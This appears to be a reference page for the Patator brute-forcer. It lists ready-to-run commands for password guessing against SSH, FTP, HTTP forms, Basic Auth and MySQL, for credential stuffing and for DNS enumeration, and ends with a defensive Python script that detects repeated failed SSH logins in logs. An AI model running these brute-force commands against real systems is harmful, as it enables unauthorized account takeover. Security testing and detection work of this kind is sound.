Description
Patator is a multi-purpose brute-forcer with a modular design. It supports brute forcing SSH, FTP, HTTP, SMTP, MySQL, MSSQL, PostgreSQL, VNC, DNS, and many more protocols. Its flexible syntax allows complex attack scenarios.
Installation
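```bash
# pip
pip3 install patator

# Kali (pre-installed)
patator -h

# Docker (assumes an image tagged "patator" was built locally, e.g. from the project's Dockerfile).
# The wordlist lives on the host, so mount it into the container and pass the in-container path.
docker run --rm -it -v "$PWD":/mnt patator ssh_login host=target.com user=admin password=FILE0 0=/mnt/passwords.txt
```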
Basic Usage
```bash
# SSH brute force
patator ssh_login host=target.com user=admin password=FILE0 0=passwords.txt

# FTP brute force
patator ftp_login host=target.com user=admin password=FILE0 0=passwords.txt

# HTTP POST login
patator http_fuzz url="https://target.com/login" method=POST \
  body="user=admin&pass=FILE0" 0=passwords.txt \
  -x ignore:fgrep="Invalid credentials"
```
Advanced Usage
```bash
# HTTP Basic Auth
patator http_fuzz url="https://target.com/admin" \
  user_pass="admin:FILE0" 0=passwords.txt \
  -x ignore:code=401

# MySQL brute force
patator mysql_login host=target.com user=root password=FILE0 0=passwords.txt

# DNS brute force (code is the numeric DNS rcode; 3 = NXDOMAIN)
patator dns_forward name=FILE0.target.com 0=subdomains.txt -x ignore:code=3

# Multiple users and passwords
patator ssh_login host=target.com user=FILE0 password=FILE1 \
  0=users.txt 1=passwords.txt

# Rate limiting (wait 1 second between attempts)
patator ssh_login host=target.com user=admin password=FILE0 \
  0=passwords.txt --rate-limit=1
```
Common Workflows
```bash
# Credential stuffing against SSH
# (mesg= is an exact match, so the trailing period of the SSH error message is required)
patator ssh_login host=target.com user=FILE0 password=FILE1 \
  0=users.txt 1=passwords.txt -x ignore:mesg="Authentication failed."

# Web form brute force with CSRF token handling
# (before_egrep takes NAME:regex; the captured group replaces NAME in the main request)
patator http_fuzz url="https://target.com/login" method=POST \
  body="user=admin&pass=FILE0&csrf=TOKEN" 0=passwords.txt \
  before_urls="https://target.com/login" before_egrep="TOKEN:csrf.*value=\"(.*?)\"" \
  -x ignore:fgrep="Invalid"
```
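Seen from the defender's side, the SSH runs above (one user with a password list, user and password lists combined, and `--rate-limit=1` pacing) all surface in sshd logs as repeated `Failed password` lines from one source. The following is an added example, not part of Patator or the original page, that flags such sources in OpenSSH-style log lines. The sample log, the 4-failure threshold, the 10-minute window and the assumed year are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (documentation IP ranges); not captured from a real host.
SAMPLE_LOG = """\
Mar 12 09:00:10 host1 sshd[2101]: Failed password for alice from 192.0.2.10 port 40110 ssh2
Mar 12 10:00:01 host1 sshd[2211]: Failed password for admin from 203.0.113.7 port 50122 ssh2
Mar 12 10:00:02 host1 sshd[2212]: Failed password for admin from 203.0.113.7 port 50124 ssh2
Mar 12 10:00:03 host1 sshd[2213]: Failed password for admin from 203.0.113.7 port 50126 ssh2
Mar 12 10:00:04 host1 sshd[2214]: Failed password for admin from 203.0.113.7 port 50128 ssh2
Mar 12 10:02:30 host1 sshd[2220]: Failed password for alice from 192.0.2.10 port 40150 ssh2
Mar 12 10:02:41 host1 sshd[2221]: Accepted password for alice from 192.0.2.10 port 40152 ssh2
Mar 12 10:05:00 host1 sshd[2301]: Failed password for root from 198.51.100.23 port 61001 ssh2
Mar 12 10:07:00 host1 sshd[2302]: Failed password for admin from 198.51.100.23 port 61002 ssh2
Mar 12 10:09:00 host1 sshd[2303]: Failed password for invalid user oracle from 198.51.100.23 port 61003 ssh2
Mar 12 10:11:00 host1 sshd[2304]: Failed password for invalid user test from 198.51.100.23 port 61004 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, max_failures=4, window=timedelta(minutes=10), year=2024):
    """Return {ip: {"failures": n, "users": set}} for sources with at least
    max_failures failed logins inside any sliding window of the given length."""
    events = defaultdict(list)  # ip -> [(timestamp, user), ...]
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:  # syslog timestamps carry no year, so one is assumed
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["ip"]].append((ts, m["user"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # drop events older than the window
                start += 1
            if end - start + 1 >= max_failures:
                flagged[ip] = {"failures": len(evs), "users": {u for _, u in evs}}
                break
    return flagged

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info["failures"], sorted(info["users"]))
```

Counting failures per source over a window, rather than per second, keeps paced attempts visible, and the set of distinct usernames separates a single-account password list from a user-list run.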